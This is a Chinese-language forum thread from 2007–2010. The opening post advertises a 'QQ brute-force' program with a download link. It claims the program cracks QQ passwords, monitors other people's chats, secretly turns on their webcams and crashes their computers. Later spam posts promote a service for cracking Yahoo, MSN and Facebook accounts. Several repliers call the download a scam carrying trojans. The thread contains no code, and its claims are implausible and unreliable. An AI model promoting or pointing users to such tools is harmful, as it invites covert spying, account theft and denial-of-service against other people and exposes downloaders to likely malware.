查看完整版本: 破解密碼~強看視訊程式
頁: [1] 2 3 4

呆ㄟㄟㄟ 發表於 2007-12-25 11:19 PM

破解密碼~強看視訊程式

QQ暴力軟件

http://www.ip10w.cn/?24488-1.html 新一版QQ暴力軟件集合超強四大功能。
1,QQ密碼暴力破解:只要輸入對方QQ號碼,按下“暴力破解”按鈕,5分钟內,該QQ號密碼就會顯示在QQ密碼框裡。
2,QQ遠程監控:輸入對方QQ號,按下“聊天監控”按鈕,則對方此刻與任何人的聊天記錄將實時顯示在下方的“監控QQ聊天記錄”框中。
3,QQ強制視屏:該軟件最核心功能!只需輸入對方QQ號碼,按下“強制視屏”,軟件便會自動打開對方攝像頭,1分钟內就能看到對方!
如果你想看到對方又不希望對方看到你怎麼辦呢?只要選擇“在右窗視屏”,則可直接在右邊視屏窗口中與對方視屏,攝像頭悄悄打開,而且不用經過QQ,所以當你看到對方了,而對方卻還是一點也不知情!
只要對方QQ在線,只要對方有攝像頭,你想悄悄看他(她)多久,就看多久!
4,強制死機:同樣輸入QQ號碼,“在右窗視屏”和“在QQ裡視屏”兩個不要選,按下“強制死機”,本軟件就會不斷向對方QQ發送大量數據,直到對方死機為止。...<div class='locked'><em>瀏覽完整內容,請先 <a href='member.php?mod=register'>註冊</a> 或 <a href='javascript:;' onclick="lsSubmit()">登入會員</a></em></div><div></div>

fifthelement 發表於 2007-12-25 11:34 PM

唉怎麼一大堆人都掛羊頭賣狗肉呀
弄個大陸網址來唬爛人
真是沒良心呀<br><br><br><br><br><div></div>

呆ㄟㄟㄟ 發表於 2007-12-27 07:38 PM

回復 #2 fifthelement 的帖子

我ㄝ不知是真是假阿!我ㄝ是想看有沒有用阿:21: 沒用我會PO在上面寫沒用啦~要是知道沒用我還會PO在這喔~還是幫ㄊ宣傳我有錢拿~不知道還說我騙人:21:<br><br><br><br><br><div></div>

BECK 發表於 2009-12-11 12:53 AM

oOoOoOoGOGOGOGOGOGOGOGOGOGOGOGOGOGOGOGOOGOGOGOGOGOGOGOGOGOGOOG

roen9631 發表於 2009-12-29 12:12 AM

並非台灣軟體套件...
有中毒的風險.

t7151420 發表於 2009-12-29 02:09 AM

你都不知道能不能用還轉過來害人喔?
你以為你轉載就沒事了?

笑掉我大牙

MAKEINTAIWAN 發表於 2010-1-31 02:18 PM

騙人的東西每天都有....

moondevil 發表於 2010-2-19 02:55 PM

謝謝大大無私的分享~
感謝大大喔
感恩<br><br><br><br><br><div></div>

gtu001 發表於 2010-2-21 07:21 PM

一堆有的沒有的....會不會有木馬

sky_911 發表於 2010-3-2 04:48 AM

到奇摩網站輸入gb.tovery.net/sky911/

就可以搜尋到提供有關 無名相簿 網誌 msn.yahoo. Facebook程式資訊

參考資料: google+自己也實際解決問題 強力推薦給大家唷^^

qqwwee882020 發表於 2010-3-28 05:35 PM

哇咧
有木馬耶
沒良心的人亂上傳

bbtzeng 發表於 2010-4-4 04:01 PM

謝謝分享  研究中~~~~~~~~

omi0409 發表於 2010-4-5 12:07 AM

妳母親知道妳在這發廢文會很傷心
{:1_newfrown:}<br><br><br><br><br><div></div>

sky_911 發表於 2010-4-10 10:13 PM

★破解密碼真的非常簡單★

奇摩搜尋輸入gb.tovery.net/sky911/

有提供有關解無名相簿 網誌 msn.yahoo. Facebook程式資訊

留下msn或是即時通聯絡方式….

版主都回的蠻快 ~ 建議大家可參考一下喔!!

參考資料: google+自己也實際解決問題 強力推薦給大家唷^^

wawa99 發表於 2010-4-20 01:57 PM

感恩!!
謝謝大大無私分享~~!!
頁: [1] 2 3 4